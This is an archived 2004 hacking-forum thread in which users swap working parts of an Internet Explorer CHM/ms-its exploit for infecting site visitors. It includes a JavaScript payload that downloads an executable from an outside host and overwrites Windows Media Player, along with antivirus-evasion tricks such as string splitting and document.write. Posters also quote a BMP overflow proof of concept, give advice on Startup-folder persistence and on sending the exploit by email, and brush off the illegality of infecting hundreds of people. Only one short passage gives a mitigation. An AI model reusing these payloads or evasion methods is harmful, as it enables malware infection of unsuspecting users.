lol, im not as dumbas i thought. i have a working version of this exploit and will upload in zip format when it is confirmed i will not be ban for doing so.
Acidxxx
Mar 8 2004, 11:10 AM
QUOTE (BrandonTurner @ Mar 8 2004, 12:30 AM)
lol, im not as dumbas i thought. i have a working version of this exploit and will upload in zip format when it is confirmed i will not be ban for doing so.
Hmm.. can you sent me this zip? please
acidxxx2001[at]yahoo.com
Tnx
lasantarosa
Mar 8 2004, 04:24 PM
hi,
can anyone tell me how to change this file into soemthing similar but not detected by antivirus:
runit.html shoud be into chm file not external file hosted on server.
BrandonTurner
Mar 8 2004, 06:17 PM
QUOTE (gogu258 @ Mar 8 2004, 05:40 PM)
runit.html shoud be into chm file not external file hosted on server.
true, which is very nice that the html doesnt have to be ont he server so no one can see what it does until they figure out it is inside the chm and they decompile it.
Acidxxx
Mar 9 2004, 06:52 PM
BrandonTurner respect!
XFT
Mar 9 2004, 07:00 PM
And what do you think about this one?
QUOTE
I downloaded the Microsoft source code. Easy enough. It's a lot bigger than Linux, but there were a lot of people mirroring it and so it didn't take long.
Anyway, I took a look, and decided that Microsoft is GAYER THAN AIDS. For example, in win2k/private/inet/mshtml/src/site/download/imgbmp.cxx:
// Before we read the bits, seek to the correct location in the file while (_bmfh.bfOffBits > (unsigned)cbRead) { BYTE abDummy[1024]; int cbSkip;
cbSkip = _bmfh.bfOffBits - cbRead;
if (cbSkip > 1024) cbSkip = 1024;
if (!Read(abDummy, cbSkip)) goto Cleanup;
cbRead += cbSkip; }
.. Rrrrriiiiggghhhttt. Way to go, using a signed integer for an offset. Now all we have to do is create a BMP with bfOffBits > 2^31,
and we're in. cbSkip goes negative and the Read call clobbers the stack with our data.
See attached for proof of concept. index.html has [img src=1.bmp] where 1.bmp contains bfOffBits=0xEEEEEEEE plus 4k of 0x44332211. Bring it up in IE5 (tested successfully on Win98) and get EIP=0x44332211.
IE6 is not vulnerable, so I guess I'll get back to work. My Warhol worm will have to wait a bit...
gogu258
Mar 9 2004, 11:58 PM
is too late for this BITMAP exploit.
extreme
Mar 10 2004, 12:07 AM
Too late? Are you nuts... It just needs a bit of knowledge and you can modify it to work with IE6.0. I will not post working version here because it is higly private, but I just wanted to let you know that it can be done, so get back to go coding and you will succeed..
BrandonTurner
Mar 10 2004, 12:40 AM
the bmp exploit is very interesting, i'm kinda excited to see it be used in the wild to see what it is capable of.
edit: i just thought of soemthing... if you email someone with the html from index.html fromt he chm exploit it should run it the exploit. i mean i think it should but im not sure.
billkennedy32
Mar 10 2004, 06:04 AM
So we can add what ever VBS code we want to the chm file. Is there a way to hide the activeX box "do you want to allow this interaction" as seen in this link
anyway its my site so feal free to do what you wish
have fun
BrandonTurner
Mar 10 2004, 07:03 AM
QUOTE (billkennedy32 @ Mar 10 2004, 06:04 AM)
So we can add what ever VBS code we want to the chm file. Is there a way to hide the activeX box "do you want to allow this interaction" as seen in this link
edit: ok, heres the problem... in mine, i use vbs to dl a exe to do my 'dirty work'. in yours you use the vbs to do your 'dirty work'. once you send this command "Set sh = CreateObject("WScript.Shell")" it makes the box pop up. so the best thing to do it make it dl an exe and then no active x box pops up.
extreme
Mar 15 2004, 03:57 PM
It is not possible to execute a file on fully patched mashine.. I tryed all I could. Public and non-public stuff... Use exploit that putts file in startup folder and that is it.
TheRealSully
Mar 17 2004, 11:27 PM
Hello all,
I have keep up with the postings and I have been able to get a working example of the exploit, but as extreme mentioned I can only write files to the locations under the "Documents and Settings" folder.
Why?
BrandonTurner
Mar 17 2004, 11:40 PM
i can gte it to write anywhere... at least c:\ and c:\windows\system32\ so that is pretty much everywhere. but i can get it to execute, i have to put it in start up folder.
TheRealSully
Mar 17 2004, 11:52 PM
QUOTE (lasantarosa @ Mar 8 2004, 04:24 PM)
hi,
can anyone tell me how to change this file into soemthing similar but not detected by antivirus:
1) Create a html file and in the head section make your long string from the asp file into a javascript string, like so ...
<html> <head> <script language="JavaScript"> var string = "<IMG SRC=' ....
2) in the body section use the document write function.
<body> <script>document.write(string);
That's it!!! Norton scans the page before it is loaded, and skips the javascript. Then the page is loaded and it rewrites itself.
I hope this is helpful.
make2004
Mar 18 2004, 06:37 AM
Thanks for the post
marachino
Mar 24 2004, 02:52 AM
So far I have this sploit working perfectly. The only problem seems to be the fact that <IMG SRC='ms-its:mhtml:file://C:\bla.MHT!http://www.bla.com//chm.chm::/runit.html'> or anything remotely like it gets stopped by Norton.
I've tried TheRealSullys way of getting around norton but it doesnt seem to work because norton does scan the javascript part.
Anyone know another way ? any help will be greatly appreciated.
TheRealSully
Mar 24 2004, 06:37 AM
marachino,
i think you put your code in the wrong place. norton will only catch it if you have your string in the "body" section of the html file because norton scans the "body" section of an html page not the "head" section.
if you make the string
var myString = "<IMG SRC='ms-its:mhtml...........::/runit.html'>";
and place it between <head> and </head>
then place
<script>document.write(myString);</script>
inbetween <body> and </body>.
finally, place all that in between <html> and </html>
<script language="javascript"> on error resume next var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET","http://www.mysite.com/myExe.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </script>
Theres undoubtedly a better a method than overwriting outlook or wmp and then forcing msie to do mms:// or mailto:, but as far as I can see nobody's talkin'.
Any hints out there?
On the subject of AV circumvention, it seems McAfee and Norton users are pretty well protected from this one right now, but many of the freeware AV's haven't gotten around to it yet.
With the document.write suggestion it seems that any AV worth a piss would catch the written file in the cache.
Also another question for you guys, have any of you tried these sorts of exploits by sending html-formatted e-mails to make outlook use msie to run the code? And if so, have you gotten it to work? I haven't taken a stab at that yet. Are there special rules when outlook runs an html file that makes it pointless to spend time tinkering with it?
lasantarosa
Mar 25 2004, 11:02 AM
QUOTE (TheRealSully @ Mar 24 2004, 06:37 AM)
marachino,
i think you put your code in the wrong place. norton will only catch it if you have your string in the "body" section of the html file because norton scans the "body" section of an html page not the "head" section.
if you make the string
var myString = "<IMG SRC='ms-its:mhtml...........::/runit.html'>";
and place it between <head> and </head>
then place
<script>document.write(myString);</script>
inbetween <body> and </body>.
finally, place all that in between <html> and </html>
this technique does indeed work against norton.
hey TheRealSully, your method doesn't work for me. Norton still detects the file. Do you have all updates installed ? I can't imagine that Norton doesn't scan head part of websites.
The really weird issue with this Exploit on my machine is that Norton detects it as Virus but doesn't stop it. Anybody else got the same process ?
cya
TheRealSully
Mar 25 2004, 10:04 PM
Sorry guy, I don't know why it is not working for you. One last thing to try, break the string into a couple of smaller strings. Then append them together and write it with document.write().
This my technique for a while and it has never failed me.
Maybe if you guys post your code I can be of more help.
lasantarosa
Mar 26 2004, 10:51 AM
got it, i had to split it, solved it with javascript and php:
var string1 = "<IMG SRC='ms-"; var string2 = "its:mhtml:file://C:\bla.MHT!http://www.domain.com//chm.chm::/runit.html'>"; <script>document.write(string1,string2);</script>
does work with norton and probably with all other antivirus too.
heh, you don't need to obfuscate the php code dude, that's on your server.. the output from the php script is what the target (and their AV) will see...
lasantarosa
Mar 26 2004, 01:39 PM
doh !
you're right
but it looks more professional , and thats the real important haXXXor stuff
extreme
Mar 26 2004, 05:37 PM
You can use this code so you don't have to modify exploit every time.. Although Refferer script is sometimes blocked.. but it can be modified too..
Then. If you use VBS code that will download file with GET, you will not be able to infect anyone with FW... Then. Use Notepad exploit version.. Just erase View-source: part, and replace it with save to Startup.. Then. You need to obfuscate VBS code that is inside exec.html, and that is it.. allways have been, and allways will be undetected by AVs..... Exploit doesn't work with Win2k High Security enabled.. And I think the patch is out now..
extreme
Mar 26 2004, 09:55 PM
Hey, WTF.. I was wrong.. I haven't tested my shit on Northon. It seems like it is recognising my version as a Bloodhound exploit.. I encoded only HTML part of exploit. All else is written in PHP, and basicly it produces standard output.. How do I fix this in a quick way, cause my exploit is already out and waiting, so I don't have time to explore what Northon is detecting and how to bypass it.. Cheers..
XFT
Mar 28 2004, 03:39 PM
This method do not work. Norton antivirus with last updates detects *.exe in cache and delete it, then detects that mplayer.exe is overwrited and delete, so exe file will not be executed:( if you write your exe to startup directory nav detects it and delete:(
Looking over windowsupdate.microsoft.com I still do not see an update or patch for this chm vulnerability. The scripts, how-to's and pocs are out there, why does MS not issue a fix? What are they doing with all those $billions that is more important than protecting 90% of the world from flaws in their products?
The best solution to this problem is limiting IE 's functionality to that of a simple browser which I doubt Microsoft is able of achieving in near future because most products and even the windows/OS developed by Microsoft cop. is based upon this extra functionality which makes the
situation even worse.
-Solution from author:
1)run regedit.exe 2)find the following key : HKEY_CLASSES_ROOT\PROTOCOLS\Handler 3)select any of the protocol handlers unnecessary 4)disable them by replacing "-" in front of their clsid value
*The author considers most of these protocol handlers vulnerable and it is best if users disablethose protocols they find unsafe. -----------------------------------------------------
The only solutions if you are forced to continue using windows involve disabling many of the redeeming features that make the Windows OS worth using at all - its integrated functionality. When that is gone all you have is a space/cpu-hogging box of crap. It is a sad state of affairs regarding microsoft and windows, and it keeps getting worse, this is a regular pattern. The corporation's power, money and influence are a detriment to secure computing as a whole. Boycott MS products.
emmmmilie
Mar 29 2004, 11:15 PM
finally succeeded in getting it to work. but on system restart, i get the message 16 bit ms-dos subsytem c:\....\Realau~1.exe The NTVDM CPU has encountered an illegal instruction CS... IP.. OP.. Choose 'Close' to terminate the application.
and then the two buttons close and ignore.
is there any way to prevent ntvdm from doing this?? or is there a better way to start the downloaded file then to use the startup folder??
btw. system was fully patched winxp sp1 system with fully updated norton av and ie 6.0
LuckyPimp
Mar 30 2004, 01:52 AM
Awsome stuff guys! However I do have a question?
Is using a IE exploit on your website legal? Or does that fall into the virus, trojan category. I know its a stupid question but I was just thinking about it and I didnt know.
Thanks
fyle
Mar 30 2004, 04:40 AM
In the US its probably illegal. The lawyers wording might be something like 'utilizing network resources in a manner that the owner didn't intend'. Phrases like bandwidth theft, worm, virus, hacker, and compromised all get jumbled together in casual speech so its hard to tell who knows what they're talking about. My experience has been that what it comes down to is whether or not what you did caused real harm in terms of significant money loss or time wasted. The word on the street is that the F.B.I. doesn't care about what goes on online until you've done the magical number of $50,000 in damages.
If you're just screwing around infecting a few hundred here and there, big deal. They're not going to kick down your front door because you have a few sdbots hidden somewhere. Their time and resources are limited and there are much, much bigger fish to fry.
LuckyPimp
Mar 31 2004, 04:18 AM
Thank you so much for the advise. I was thinking about writing it into my terms of service, and making them agree to the TOS before to try and maybe help it be closer to legal?
anyways I was just wondering because i cant find any information on it on the internet. it seems like the fedral goverment just keeps packaging things together when there are clear lines on the internet of what things are.
Thanks for the info.
anyone else have any views on this?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
please
